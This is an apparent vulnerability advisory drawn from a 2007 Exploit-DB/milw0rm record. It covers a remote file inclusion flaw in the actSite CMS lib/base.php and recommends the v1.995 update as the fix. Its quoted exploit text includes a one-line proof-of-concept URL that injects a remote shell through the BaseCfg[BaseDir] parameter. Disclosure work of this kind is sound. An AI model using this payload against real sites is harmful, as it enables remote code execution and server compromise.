actSite v1.991 Beta (base.php) Remote File Inclusion

vendor:

actSite

by:

DNX

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: actSite

Affected Version From: v1.991 Beta

Affected Version To: v1.995

Patch Exists: YES

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

actSite v1.991 Beta (base.php) Remote File Inclusion

A remote file inclusion vulnerability exists in actSite v1.991 Beta. The vulnerability is due to improper sanitization of user-supplied input in the $BaseCfg[BaseDir] parameter in lib/base.php. An attacker can exploit this vulnerability to include arbitrary remote files, which could lead to remote code execution.

Mitigation:

Install update to v1.995

Source

Exploit-DB raw data:

                             \#'#/

                             (-.-)

   ---------------------oOO---(_)---OOo--------------------

   | actSite v1.991 Beta (base.php) Remote File Inclusion |

   |                     coded by DNX                     |

   --------------------------------------------------------

[!] Discovered: DNX

[!] Vendor: http://www.actsite.de

[!] Detected: 02.09.2007

[!] Reported: 02.09.2007

[!] Remote: yes



[!] Background: actSite is a content management system based on PHP and MySQL



[!] Bug: $BaseCfg[BaseDir] in lib/base.php



[!] PoC: 

    - http://[site]/[path]/lib/base.php?BaseCfg[BaseDir]=[shell]



[!] Solution: Install update to v1.995

# milw0rm.com [2007-10-01]